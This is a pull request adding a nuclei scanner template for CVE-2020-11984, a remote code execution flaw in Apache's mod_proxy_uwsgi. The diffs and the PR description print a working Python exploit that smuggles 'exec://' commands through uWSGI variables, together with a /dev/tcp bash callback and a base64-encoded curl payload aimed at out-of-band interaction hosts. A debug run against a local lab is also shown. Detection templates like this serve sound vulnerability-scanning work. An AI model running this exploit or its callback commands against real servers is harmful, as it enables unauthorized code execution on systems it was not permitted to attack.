### PR TITLE
add CVE-2020-11984

### DIFF
--- a/code/cves/2020/CVE-2020-11984.yaml
+++ b/code/cves/2020/CVE-2020-11984.yaml
@@ -1,0 +1,82 @@
+id: CVE-2020-11984
+
+info:
+  name: Apache HTTP Server - Remote Code Execution
+  author: wofeiwo@80sec.com,pszyszkowski
+  severity: critical
+  description: |
+    Apache HTTP Server 2.4.32 to 2.4.44 contains an info disclosure and possible remote code execution caused by a vulnerability in mod_proxy_uwsgi, letting remote attackers access sensitive information and potentially execute arbitrary code, exploit requires sending crafted requests.
+  remediation: |
+    Update to >= 2.4.45
+  reference:
+    - https://github.com/RubenBar/MLW-upcrans/tree/main/1.Exploit
+    - https://nvd.nist.gov/vuln/detail/cve-2020-11984
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2020-11984
+    cwe-id: CWE-120
+  metadata:
+    verified: true
+    vendor: apache
+    product: http_server
+    shodan-query:
+      - server: cpe:"cpe:2.3:a:apache:http_server"
+  tags: cve,cve2020,apache,httpd,rce
+variables:
+  callback: "/bin/bash -c 'echo 1 > /dev/tcp/{{interactsh-url}}/80'"
+code:
+  - engine:
+      - py
+      - python3
+    source: |
+      import sys
+      import os
+      import argparse
+      import requests
+
+      uwsgi_addr = os.getenv('BaseURL')
+      command = os.getenv('callback')
+
+      def sz(x):
+          s = hex(x if isinstance(x, int) else len(x))[2:].rjust(4, '0')
+          s = bytes.fromhex(s)
+          return s[::-1]
+
+      def pack_uwsgi_vars(var):
+          pk = b''
+          for k, v in var.items() if hasattr(var, 'items') else var:
+              pk += sz(k) + k.encode('utf8') + sz(v) + v.encode('utf8')
+          result = b'\x00' + sz(pk) + b'\x00' + pk
+          return result
+
+      def fetch_data(uri, var=None, payload=None, body=None):
+          if 'http' not in uri:
+              uri = 'http://' + uri
+
+          session = requests.Session()
+
+          d = session.get(uri, data=pack_uwsgi_vars(var))
+
+          return {
+              'code': d.status_code,
+              'text': d.text,
+              'header': d.headers
+          }
+
+      def curl(addr_and_port, payload, uri):
+          var = {'UWSGI_FILE': payload, 'SCRIPT_NAME': uri}
+          return fetch_data(addr_and_port+uri, var, payload)
+
+      def main(*args):
+          payload = 'exec://' + command + '; echo ""' # must have someting in output or the uWSGI crashs.
+          print("[*]Sending payload.")
+          print(curl(uwsgi_addr, payload, '/penetrate'))
+
+      if __name__ == '__main__':
+          main()
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"

--- a/code/cves/2020/CVE-2020-11984.yaml
+++ b/code/cves/2020/CVE-2020-11984.yaml
@@ -2,7 +2,7 @@ id: CVE-2020-11984
 
 info:
   name: Apache HTTP Server - Remote Code Execution
-  author: wofeiwo@80sec.com,pszyszkowski
+  author: wofeiwo@80sec.com,pszyszkowski,pdresearch,iamnoooob
   severity: critical
   description: |
     Apache HTTP Server 2.4.32 to 2.4.44 contains an info disclosure and possible remote code execution caused by a vulnerability in mod_proxy_uwsgi, letting remote attackers access sensitive information and potentially execute arbitrary code, exploit requires sending crafted requests.
@@ -23,60 +23,22 @@ info:
     shodan-query:
       - server: cpe:"cpe:2.3:a:apache:http_server"
   tags: cve,cve2020,apache,httpd,rce
+
 variables:
-  callback: "/bin/bash -c 'echo 1 > /dev/tcp/{{interactsh-url}}/80'"
-code:
-  - engine:
-      - py
-      - python3
-    source: |
-      import sys
-      import os
-      import argparse
-      import requests
+  oast: ".{{interactsh-url}}"
+  payload: "{{padding(oast,'a',54,'prefix')}}"
 
-      uwsgi_addr = os.getenv('BaseURL')
-      command = os.getenv('callback')
+http:
+  - raw:
+      - |-
+        POST /penterate HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
 
-      def sz(x):
-          s = hex(x if isinstance(x, int) else len(x))[2:].rjust(4, '0')
-          s = bytes.fromhex(s)
-          return s[::-1]
+        {{replace(base64_decode('AHIAAAoAVVdTR0lfRklMRUsAZXhlYzovL2N1cmwgYWFhYWFhYWEuZmw0NGhoY240NHEydWtsdjI5YnB6dTR1amxwY2QzM3JzLm9hc3RpZnkuY29tOyBlY2hvICIiCwBTQ1JJUFRfTkFNRQoAL3BlbmV0cmF0ZQ=='),'aaaaaaaa.fl44hhcn44q2uklv29bpzu4ujlpcd33rs.oastify.com',payload)}}
 
-      def pack_uwsgi_vars(var):
-          pk = b''
-          for k, v in var.items() if hasattr(var, 'items') else var:
-              pk += sz(k) + k.encode('utf8') + sz(v) + v.encode('utf8')
-          result = b'\x00' + sz(pk) + b'\x00' + pk
-          return result
-
-      def fetch_data(uri, var=None, payload=None, body=None):
-          if 'http' not in uri:
-              uri = 'http://' + uri
-
-          session = requests.Session()
-
-          d = session.get(uri, data=pack_uwsgi_vars(var))
-
-          return {
-              'code': d.status_code,
-              'text': d.text,
-              'header': d.headers
-          }
-
-      def curl(addr_and_port, payload, uri):
-          var = {'UWSGI_FILE': payload, 'SCRIPT_NAME': uri}
-          return fetch_data(addr_and_port+uri, var, payload)
-
-      def main(*args):
-          payload = 'exec://' + command + '; echo ""' # must have someting in output or the uWSGI crashs.
-          print("[*]Sending payload.")
-          print(curl(uwsgi_addr, payload, '/penetrate'))
-
-      if __name__ == '__main__':
-          main()
+    matchers-condition: and
     matchers:
-      - type: word
-        part: interactsh_protocol
-        words:
-          - "dns"
+      - type: dsl
+        dsl:
+          - 'contains(interactsh_protocol, "dns")'

--- a/code/cves/2020/CVE-2020-11984.yaml
+++ b/code/cves/2020/CVE-2020-11984.yaml
@@ -18,10 +18,10 @@ info:
     cwe-id: CWE-120
   metadata:
     verified: true
+    max-request: 1
     vendor: apache
     product: http_server
-    shodan-query:
-      - server: cpe:"cpe:2.3:a:apache:http_server"
+    shodan-query: cpe:"cpe:2.3:a:apache:http_server"
   tags: cve,cve2020,apache,httpd,rce
 
 variables:
@@ -30,15 +30,16 @@ variables:
 
 http:
   - raw:
-      - |-
-        POST /penterate HTTP/1.1
+      - |
+        POST / HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
         {{replace(base64_decode('AHIAAAoAVVdTR0lfRklMRUsAZXhlYzovL2N1cmwgYWFhYWFhYWEuZmw0NGhoY240NHEydWtsdjI5YnB6dTR1amxwY2QzM3JzLm9hc3RpZnkuY29tOyBlY2hvICIiCwBTQ1JJUFRfTkFNRQoAL3BlbmV0cmF0ZQ=='),'aaaaaaaa.fl44hhcn44q2uklv29bpzu4ujlpcd33rs.oastify.com',payload)}}
 
-    matchers-condition: and
     matchers:
       - type: dsl
         dsl:
-          - 'contains(interactsh_protocol, "dns")'
+          - 'contains(interactsh_protocol, "http")'
+          - 'contains(interactsh_request, "User-Agent: curl")'
+        condition: and


### PR DESCRIPTION
### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Added CVE-2020-11984
- References:
  - https://github.com/RubenBar/MLW-upcrans/tree/main/1.Exploit
  - https://nvd.nist.gov/vuln/detail/cve-2020-11984

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

Lab: https://github.com/projectdiscovery/nuclei-templates-labs/pull/19

Debug:
```
nuclei -u http://127.0.0.1:8888 -t CVE-2020-11984.yaml -code -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.5

                projectdiscovery.io

[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from pszyszkowski
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.live
[DBG] [CVE-2020-11984] Dumped Executed Source Code for input/stdin: 'http://127.0.0.1:8888'
---------------
Source Code:
---------------
import sys
import os
import argparse
import requests

uwsgi_addr = os.getenv('BaseURL')
command = os.getenv('callback')

def sz(x):
    s = hex(x if isinstance(x, int) else len(x))[2:].rjust(4, '0')
    s = bytes.fromhex(s)
    return s[::-1]

def pack_uwsgi_vars(var):
    pk = b''
    for k, v in var.items() if hasattr(var, 'items') else var:
        pk += sz(k) + k.encode('utf8') + sz(v) + v.encode('utf8')
    result = b'\x00' + sz(pk) + b'\x00' + pk
    return result

def fetch_data(uri, var=None, payload=None, body=None):
    if 'http' not in uri:
        uri = 'http://' + uri

    session = requests.Session()

    d = session.get(uri, data=pack_uwsgi_vars(var))

    return {
        'code': d.status_code,
        'text': d.text,
        'header': d.headers
    }

def curl(addr_and_port, payload, uri):
    var = {'UWSGI_FILE': payload, 'SCRIPT_NAME': uri}
    return fetch_data(addr_and_port+uri, var, payload)

def main(*args):
    payload = 'exec://' + command + '; echo ""' # must have someting in output or the uWSGI crashs.
    print("[*]Sending payload.")
    print(curl(uwsgi_addr, payload, '/penetrate'))

if __name__ == '__main__':
    main()


---------------
Command Executed:
---------------
/usr/bin/python3 /tmp/nuclei-tmp-3258076635/1510881000

---------------
Command Output:
---------------
[*]Sending payload.
{'code': 200, 'text': 'Hello WorldHTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\nHello World', 'header': {'Date': 'Sun, 22 Jun 2025 01:57:26 GMT', 'Server': 'Apache/2.4.32 (Unix)', 'Content-Type': 'text/html', 'Keep-Alive': 'timeout=5, max=100', 'Connection': 'Keep-Alive', 'Transfer-Encoding': 'chunked'}}

[WRN] Command Output here is stdout+sterr, in response variables they are seperate (use -v -svd flags for more details)
[DBG] [CVE-2020-11984] Dumped Code Execution for http://127.0.0.1:8888

[*]Sending payload.
{'code': 200, 'text': 'Hello WorldHTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\nHello World', 'header': {'Date': 'Sun, 22 Jun 2025 01:57:26 GMT', 'Server': 'Apache/2.4.32 (Unix)', 'Content-Type': 'text/html', 'Keep-Alive': 'timeout=5, max=100', 'Connection': 'Keep-Alive', 'Transfer-Encoding': 'chunked'}}

[d1bm60q1sadisv2q2dm08comzi7zsjbj7] Received DNS interaction from 172.69.49.15 at 2025-06-22 01:57:28
------------
DNS Request
------------

;; opcode: QUERY, status: NOERROR, id: 21298
;; flags:; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version 0; flags: do; udp: 1452

;; QUESTION SECTION:
;d1bm60q1sadisv2q2dm08comzi7zsjbj7.oast.live.   IN       A



------------
DNS Response
------------

;; opcode: QUERY, status: NOERROR, id: 21298
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;d1bm60q1sadisv2q2dm08comzi7zsjbj7.oast.live.   IN       A

;; ANSWER SECTION:
d1bm60q1sadisv2q2dm08comzi7zsjbj7.oast.live.    3600    IN      A       178.128.210.172

;; AUTHORITY SECTION:
d1bm60q1sadisv2q2dm08comzi7zsjbj7.oast.live.    3600    IN      NS      ns1.oast.live.
d1bm60q1sadisv2q2dm08comzi7zsjbj7.oast.live.    3600    IN      NS      ns2.oast.live.

;; ADDITIONAL SECTION:
ns1.oast.live.  3600    IN      A       178.128.210.172
ns2.oast.live.  3600    IN      A       178.128.210.172


[CVE-2020-11984:word-1] [code] [critical] http://127.0.0.1:8888
[INF] Scan completed in 12.249420448s. 1 matches found.
```

#### Additional Details (leave it blank if not applicable)

 /claim #12266

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)